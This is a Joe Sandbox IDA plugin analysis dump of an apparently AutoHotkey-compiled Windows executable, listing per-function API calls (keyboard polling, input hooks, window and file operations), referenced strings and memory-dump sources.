GetAsyncKeyState.USER32(000000A5), ref: 0040DE05
GetAsyncKeyState.USER32(0000005B), ref: 0040DE16
GetAsyncKeyState.USER32(0000005C), ref: 0040DE27
GetTickCount.KERNEL32 ref: 0040DEC9
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DEEE
GetTickCount.KERNEL32 ref: 0040DF18
__Stoull.NTSTC_LIBCMT ref: 0040DF44
__Stoull.NTSTC_LIBCMT ref: 0040DFC0
PostMessageW.USER32(00000000,00000102,?,00000000), ref: 0040DFF1
__itow.LIBCMT ref: 0040E021

Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A0), ref: 0040EB06
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A1), ref: 0040EB19
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A2), ref: 0040EB2D
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A3), ref: 0040EB41
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A4), ref: 0040EB55
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A5), ref: 0040EB69
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(0000005B), ref: 0040EB7A
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(0000005C), ref: 0040EB8B

Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A0), ref: 0040D0D5
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A1), ref: 0040D0E8
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A2), ref: 0040D0FC
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A3), ref: 0040D110
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A4), ref: 0040D124
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A5), ref: 0040D138
Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005B), ref: 0040D149
Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005C), ref: 0040D15A
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A0), ref: 0040D1DD
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A1), ref: 0040D1F0
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A2), ref: 0040D204
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A3), ref: 0040D218
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A4), ref: 0040D22C
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A5), ref: 0040D240
Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005B), ref: 0040D251
Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005C), ref: 0040D262
Part of subcall function 0040D090: SendInput.USER32(00000002,?,0000001C), ref: 0040D4C7

PostMessageA.USER32(?,00000102,00000000,00000000), ref: 0040E216

Part of subcall function 00411DB0: VkKeyScanExA.USER32(00000000,00000000), ref: 00411DB9

Part of subcall function 0040E650: GetTickCount.KERNEL32 ref: 0040E6A8
Part of subcall function 0040E650: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040E6CB
Part of subcall function 0040E650: GetTickCount.KERNEL32(?,00000000), ref: 0040E6F5
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A0), ref: 0040E734
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A1), ref: 0040E747
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A2), ref: 0040E75B
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A3), ref: 0040E76F
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A4), ref: 0040E783
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A5), ref: 0040E797
Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005B), ref: 0040E7A8
Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005C), ref: 0040E7B9
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A0), ref: 0040E8DE
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A1), ref: 0040E8F1
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A2), ref: 0040E905
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A3), ref: 0040E919
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A4), ref: 0040E92D
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A5), ref: 0040E941
Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005B), ref: 0040E952
Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005C), ref: 0040E963

Part of subcall function 0040E9F0: __itow.LIBCMT ref: 0040EA0E
Part of subcall function 0040E9F0: GetTickCount.KERNEL32(?,?,00000000,?,?,?), ref: 0040EA39
Part of subcall function 0040E9F0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EA5C
Part of subcall function 0040E9F0: GetTickCount.KERNEL32(?,00000000,?,?,?), ref: 0040EA81

Part of subcall function 00410820: SendInput.USER32(00000000,00000000,0000001C), ref: 00410880
Part of subcall function 00410820: GetForegroundWindow.USER32 ref: 004108C3
Part of subcall function 00410820: SetWindowsHookExA.USER32(00000001,0040EC50,00400000,00000000), ref: 00410900

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

GetTickCount.KERNEL32 ref: 0040E31E
GetAsyncKeyState.USER32(000000A0), ref: 0040E38C
GetAsyncKeyState.USER32(000000A1), ref: 0040E39F
GetAsyncKeyState.USER32(000000A2), ref: 0040E3B3
GetAsyncKeyState.USER32(000000A3), ref: 0040E3C7
GetAsyncKeyState.USER32(000000A4), ref: 0040E3DB
GetAsyncKeyState.USER32(000000A5), ref: 0040E3EF
GetAsyncKeyState.USER32(0000005B), ref: 0040E400
GetAsyncKeyState.USER32(0000005C), ref: 0040E411

Part of subcall function 00410D40: GetWindowThreadProcessId.USER32(?,00000000), ref: 00411409

GetKeyState.USER32(00000014), ref: 0040E4B1
GetKeyState.USER32(00000014), ref: 0040E4B9

Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D

GetForegroundWindow.USER32 ref: 0040E4ED
GetWindowThreadProcessId.USER32(00000000), ref: 0040E4F4
AttachThreadInput.USER32(00000E10,?,00000000), ref: 0040E529
GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040E552
GetProcAddress.KERNEL32(00000000), ref: 0040E559

Strings

{Blind}, xrefs: 0040D50A
BlockInput, xrefs: 0040D882, 0040E548
Temp, xrefs: 0040DBB0
ASC , xrefs: 0040DF3E
Raw, xrefs: 0040DB2D
user32, xrefs: 0040D887, 0040E54D
{Click, xrefs: 0040D561
^+!#{}, xrefs: 0040D948
Down, xrefs: 0040DA31, 0040DB9C
@, xrefs: 0040D9BD
0, xrefs: 0040E01D
Click, xrefs: 0040DA7E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00462A00, Relevance: 96.9, APIs: 47, Strings: 8, Instructions: 679window

APIs

SetWindowTextA.USER32(?,?), ref: 00462A2C
IsZoomed.USER32 ref: 00462A50
IsIconic.USER32(?), ref: 00462A60
__Stoull.NTSTC_LIBCMT ref: 00462AED

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

__Stoull.NTSTC_LIBCMT ref: 00462B14
__Stoull.NTSTC_LIBCMT ref: 00462B43
__Stoull.NTSTC_LIBCMT ref: 00462B69
__Stoull.NTSTC_LIBCMT ref: 00462B93
__Stoull.NTSTC_LIBCMT ref: 00462BB9
__Stoull.NTSTC_LIBCMT ref: 00462BE3
__Stoull.NTSTC_LIBCMT ref: 00462C10
__Stoull.NTSTC_LIBCMT ref: 00462C53
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00462CD0
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00462CF5
ShowWindow.USER32(?,00000000), ref: 00462D56
IsIconic.USER32(?), ref: 00462D65
GetWindowLongA.USER32(?,000000F0), ref: 00462DB2
GetWindowRect.USER32(?,?), ref: 00462DC7
MapWindowPoints.USER32(00000000,00000018,?,00000002), ref: 00462DDA
GetWindowLongA.USER32(?,000000F0), ref: 00462E2F
GetWindowRect.USER32(?,?), ref: 00462E49
GetWindowLongA.USER32(?,000000F0), ref: 00462ED2
GetWindowRect.USER32(?,?), ref: 00462EE8
GetClientRect.USER32(?,?), ref: 00462F07
IsWindowVisible.USER32(?), ref: 00462F91
GetWindowLongA.USER32(?,000000F0), ref: 00462FCC
GetWindowLongA.USER32(?,000000EC), ref: 00462FD6
GetMenu.USER32(?), ref: 00462FDD
AdjustWindowRectEx.USER32(?,00000000,00000000), ref: 00462FF0
GetSystemMetrics.USER32(00000003), ref: 00463010
GetSystemMetrics.USER32(00000002), ref: 00463022
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00463035
GetWindowRect.USER32(?,?), ref: 004630AE
IsZoomed.USER32(?), ref: 004630F0
ShowWindow.USER32(?,00000009), ref: 00463100
MoveWindow.USER32(?,80000001,?,?,?,?), ref: 0046312E
GetWindowRect.USER32(?,?), ref: 0046314D
GetClientRect.USER32(?,?), ref: 0046315F
ShowWindow.USER32(?,?), ref: 00463239
GetAncestor.USER32(?,00000002), ref: 00463261
GetForegroundWindow.USER32 ref: 00463273
SetFocus.USER32(?), ref: 0046330E

Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0047553B
Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 0047555A
Part of subcall function 00475520: FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0047556C
Part of subcall function 00475520: IsIconic.USER32(00000000), ref: 00475583
Part of subcall function 00475520: ShowWindow.USER32(00000000,00000009), ref: 00475590
Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004755C1
Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 004755E7
Part of subcall function 00475520: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00475600
Part of subcall function 00475520: SetForegroundWindow.USER32(00000000), ref: 00475621
Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 00475643
Part of subcall function 00475520: GetWindow.USER32(00000000,00000004), ref: 0047565A
Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,?,00000000), ref: 004756BE
Part of subcall function 00475520: AttachThreadInput.USER32(?,?,00000000), ref: 004756D7
Part of subcall function 00475520: BringWindowToTop.USER32(00000000), ref: 004756E2

GetFocus.USER32 ref: 00463298
GetDlgCtrlID.USER32(00000000), ref: 004632B4
GetParent.USER32(00000000), ref: 004632BF
GetDlgCtrlID.USER32(00000000), ref: 004632CC
UpdateWindow.USER32(00000013), ref: 004632FA

Part of subcall function 004669E0: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 004669FD
Part of subcall function 004669E0: GetWindowLongA.USER32(?,000000F0), ref: 00466A12
Part of subcall function 004669E0: IsWindowVisible.USER32(?), ref: 00466A33
Part of subcall function 004669E0: IsIconic.USER32(?), ref: 00466A46
Part of subcall function 004669E0: GetFocus.USER32 ref: 00466A7A
Part of subcall function 004669E0: GetWindowRect.USER32(?,?), ref: 00466AAA
Part of subcall function 004669E0: SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00466AC2
Part of subcall function 004669E0: GetWindowLongA.USER32(?,000000F0), ref: 00466B4D
Part of subcall function 004669E0: ShowWindow.USER32(00000000,00000000), ref: 00466B80
Part of subcall function 004669E0: EnableWindow.USER32(?,00000001), ref: 00466B94
Part of subcall function 004669E0: EnableWindow.USER32(00000000,00000000), ref: 00466BA5
Part of subcall function 004669E0: GetWindowRect.USER32(?,?), ref: 00466BB9
Part of subcall function 004669E0: PtInRect.USER32(?,?,?), ref: 00466BD4
Part of subcall function 004669E0: PtInRect.USER32(?,?,?), ref: 00466BE9
Part of subcall function 004669E0: SetFocus.USER32(00000000), ref: 00466C2B
Part of subcall function 004669E0: SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00466C6F
Part of subcall function 004669E0: SetFocus.USER32(00000000), ref: 00466C7C
Part of subcall function 004669E0: InvalidateRect.USER32(?,00000000,00000001), ref: 00466C95
Part of subcall function 004669E0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00466CB1
Part of subcall function 004669E0: InvalidateRect.USER32(?,?,00000001), ref: 00466CC2

Strings

Invalid option., xrefs: 00462E65
Hide, xrefs: 00462C4D
Maximize, xrefs: 00462B63
Restore, xrefs: 00462BDD
Minimize, xrefs: 00462B3D
AutoSize, xrefs: 00462AE7
Center, xrefs: 00462B0E, 00462C0A
NoActivate, xrefs: 00462BB3

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00414C40, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 264comwindowclipboard

APIs

Part of subcall function 00408970: CreateThread.KERNEL32(00000000,00002000,00408C80,00000000,00000000,004A9108), ref: 004089CA
Part of subcall function 00408970: SetThreadPriority.KERNEL32(00000000,0000000F), ref: 004089E0
Part of subcall function 00408970: PostThreadMessageA.USER32(00000000,00000417,?,00000000), ref: 00408A04
Part of subcall function 00408970: Sleep.KERNEL32(0000000A), ref: 00408A10
Part of subcall function 00408970: GetTickCount.KERNEL32 ref: 00408A27
Part of subcall function 00408970: PeekMessageA.USER32(?,00000000,00000417,00000417,00000001), ref: 00408A4A
Part of subcall function 00408970: CreateMutexA.KERNEL32(00000000,00000000,AHK Keybd), ref: 00408AC5
Part of subcall function 00408970: GetExitCodeThread.KERNEL32(00000000,?), ref: 00408ADA
Part of subcall function 00408970: GetTickCount.KERNEL32 ref: 00408AEA
Part of subcall function 00408970: Sleep.KERNEL32(00000000), ref: 00408AF7
Part of subcall function 00408970: CloseHandle.KERNEL32(00000000), ref: 00408B0F
Part of subcall function 00408970: CloseHandle.KERNEL32(00000000), ref: 00408B2F
Part of subcall function 00408970: CreateMutexA.KERNEL32(00000000,00000000,AHK Mouse), ref: 00408B54
Part of subcall function 00408970: CloseHandle.KERNEL32(00000000), ref: 00408B6B

Shell_NotifyIcon.SHELL32(00000002,004AC3F6), ref: 00414C89
IsWindow.USER32(00000000), ref: 00414CA7
DestroyWindow.USER32(00000000), ref: 00414CB4
DeleteObject.GDI32(00000000), ref: 00414CC2
DeleteObject.GDI32(00000000), ref: 00414CCC
DeleteObject.GDI32(00000000), ref: 00414CD6
DeleteObject.GDI32(00000000), ref: 00414CFD
DestroyCursor.USER32(00000000), ref: 00414D01
IsWindow.USER32(00000000), ref: 00414D0B
DestroyWindow.USER32(00000000), ref: 00414D19
DeleteObject.GDI32(00000000), ref: 00414D27
DeleteObject.GDI32(00000000), ref: 00414D31
DeleteObject.GDI32(00000000), ref: 00414D3B
DeleteObject.GDI32(?), ref: 00414D8F
DestroyCursor.USER32(00000000), ref: 00414DA7
DestroyCursor.USER32(00000000), ref: 00414DB0
IsWindow.USER32(00000000), ref: 00414DDE
DestroyWindow.USER32(00000000), ref: 00414DEB
DeleteObject.GDI32(00000000), ref: 00414E06
ChangeClipboardChain.USER32(000601DA,00000000), ref: 00414E4D
mciSendStringA.WINMM(status AHK_PlayMe mode,?,00000208,00000000), ref: 00414E7A
mciSendStringA.WINMM(close AHK_PlayMe,00000000,00000000,00000000), ref: 00414E8E
RtlDeleteCriticalSection.NTDLL(004A90F0), ref: 00414E95
OleUninitialize.OLE32 ref: 00414E9B

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Part of subcall function 00468B10: DeleteObject.GDI32(?), ref: 00468BA1

Part of subcall function 0045BFA0: SendMessageA.USER32(?,00000406,00000000,00000000), ref: 0045BFF3
Part of subcall function 0045BFA0: SendMessageA.USER32(?,00000414,00000000,00000000), ref: 0045C00C
Part of subcall function 0045BFA0: DestroyCursor.USER32(00000000), ref: 0045C013
Part of subcall function 0045BFA0: IsWindow.USER32(00000000), ref: 0045C022
Part of subcall function 0045BFA0: ShowWindow.USER32(00000000,00000000), ref: 0045C032
Part of subcall function 0045BFA0: SetMenu.USER32(00000000,00000000), ref: 0045C03E
Part of subcall function 0045BFA0: DestroyWindow.USER32(00000000), ref: 0045C058
Part of subcall function 0045BFA0: DeleteObject.GDI32(?), ref: 0045C09F
Part of subcall function 0045BFA0: DeleteObject.GDI32(?), ref: 0045C0B3
Part of subcall function 0045BFA0: DragFinish.SHELL32(?,?,004AA69C,77535F14,7619A747,00414D61,?,?,?,?,?,00000000,00000000), ref: 0045C0C7
Part of subcall function 0045BFA0: DestroyCursor.USER32(?), ref: 0045C0FB
Part of subcall function 0045BFA0: DeleteObject.GDI32(?), ref: 0045C103
Part of subcall function 0045BFA0: DestroyCursor.USER32(?), ref: 0045C17A
Part of subcall function 0045BFA0: DestroyCursor.USER32(?), ref: 0045C17D
Part of subcall function 0045BFA0: DestroyAcceleratorTable.USER32(?), ref: 0045C187

Strings

status AHK_PlayMe mode, xrefs: 00414E75
close AHK_PlayMe, xrefs: 00414E89

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00451E00, Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 238window

APIs

GetFullPathNameA.KERNEL32(004987E9,00000104,?,00000002,00000002), ref: 00451E20
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451E62
GetFileAttributesA.KERNEL32(?), ref: 00451E99
GetFileAttributesA.KERNEL32(?), ref: 00451ED1
FindFirstFileA.KERNEL32(?,?), ref: 00451F0A
GetLastError.KERNEL32 ref: 00451F19
__wsplitpath.LIBCMT ref: 00451F67

Part of subcall function 004876F2: __splitpath_helper.LIBCMT ref: 00487734

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

GetTickCount.KERNEL32 ref: 00451FB0
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00451FD7
GetTickCount.KERNEL32 ref: 00451FED

Part of subcall function 00452140: __wsplitpath.LIBCMT ref: 00452199
Part of subcall function 00452140: __wsplitpath.LIBCMT ref: 004521BF

MoveFileA.KERNEL32(?,?), ref: 00452082
DeleteFileA.KERNEL32(?), ref: 0045209D
MoveFileA.KERNEL32(?,?), ref: 004520B7
GetLastError.KERNEL32 ref: 004520C1
CopyFileA.KERNEL32(?,?,00000000), ref: 004520EB
GetLastError.KERNEL32 ref: 004520F5
FindNextFileA.KERNEL32(?,00000010), ref: 0045210E
FindClose.KERNEL32(?), ref: 00452121

Strings

\, xrefs: 00451E7B
\*.*, xrefs: 00451EB8, 00451EEC
\, xrefs: 00451E3B
%s%s, xrefs: 00451F7C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00404B30, Relevance: 23.1, APIs: 9, Strings: 3, Instructions: 2082threadkeyboardwindow

APIs

GetTickCount.KERNEL32 ref: 00404BB6
GetForegroundWindow.USER32 ref: 00404BE7
PostMessageA.USER32(000601DA,00000418,0000000C,00000000), ref: 00404C0C
GetKeyState.USER32(00000090), ref: 00404CC8
FindWindowA.USER32(#32771,00000000), ref: 00404E3E
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00404E4B
GetCurrentThreadId.KERNEL32 ref: 00404E53

Part of subcall function 004066E0: PostMessageA.USER32(000601DA,00000400,?,?), ref: 004067A6
Part of subcall function 004066E0: PostMessageA.USER32(000601DA,00000400,?,?), ref: 004067DA
Part of subcall function 004066E0: PostMessageA.USER32(000601DA,00000401,00000000,?), ref: 004067F8

FindWindowA.USER32(#32768,00000000), ref: 0040503C
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00405049

Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D

Part of subcall function 00411930: GetForegroundWindow.USER32 ref: 00411930
Part of subcall function 00411930: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0041193D
Part of subcall function 00411930: GetKeyboardLayout.USER32(00000000), ref: 00411948

Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A0), ref: 00411465
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A1), ref: 00411478
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A2), ref: 0041148C
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A3), ref: 004114A0
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A4), ref: 004114B4
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A5), ref: 004114C8
Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005B), ref: 004114D9
Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005C), ref: 004114EA

Part of subcall function 00406810: FindWindowA.USER32(#32771,00000000), ref: 00406983
Part of subcall function 00406810: GetForegroundWindow.USER32 ref: 004069C0
Part of subcall function 00406810: FindWindowA.USER32(#32771,00000000), ref: 00406A96
Part of subcall function 00406810: GetForegroundWindow.USER32 ref: 00406AD2
Part of subcall function 00406810: CallNextHookEx.USER32(?,?,?,?), ref: 00406C39
Part of subcall function 00406810: PostMessageA.USER32(000601DA,00000400,?,?), ref: 00406C69
Part of subcall function 00406810: PostMessageA.USER32(000601DA,00000400,00000000,?), ref: 00406C9E
Part of subcall function 00406810: PostMessageA.USER32(000601DA,00000401,7FFFFFFF,?), ref: 00406CBC

Part of subcall function 00407A20: GetTickCount.KERNEL32(?,004079A6,?,?,004068FA,?,?,?,00000000), ref: 00407A8D
Part of subcall function 00407A20: GetTickCount.KERNEL32(?,004079A6,?,?,004068FA,?,?,?,00000000), ref: 00407A9A

Strings

#32768, xrefs: 00405037
N/A, xrefs: 00406593, 004064F3, 004064BA, 00406494, 0040631C, 00406107, 00405D2E, 00405F9E, 00405F48, 00405E4F, 004059E1, 0040553A, 00405423, 004054B4, 0040548E, 00405311, 00405007, 00404C48, 00404C4B, 00405017, 00405322, 00405431, 0040549E, 004054CB, 004054DC, 0040554A, 004059F3, 00405D3F, 00405E53, 00405F59, 00405FAD, 0040610C, 00406321, 00406498, 004064C3, 00406502, 004065A3
#32771, xrefs: 00404E39

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0047A409, Relevance: 20.0, APIs: 1, Strings: 10, Instructions: 769

APIs

_strncmp.LIBCMT ref: 0047A45B

Part of subcall function 00479680: _strncmp.LIBCMT ref: 0047969E

Strings

@, xrefs: 0047A9DC
Q\E, xrefs: 0047A455
], xrefs: 0047A809
\, xrefs: 0047A51B
\, xrefs: 0047A448
^, xrefs: 0047A474
[, xrefs: 0047A53C
], xrefs: 0047A47E
, xrefs: 0047A99B
\, xrefs: 0047A6AC

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0043C070, Relevance: 18.4, APIs: 6, Strings: 4, Instructions: 912clipboardstring

APIs

Part of subcall function 0041F080: _strncpy.LIBCMT ref: 0041F0D2
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F14D
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F310
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F4B6
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F71A
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041FC2B
Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041FFC1
Part of subcall function 0041F080: _strncpy.LIBCMT ref: 00420241

__Stoull.NTSTC_LIBCMT ref: 0043C220

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

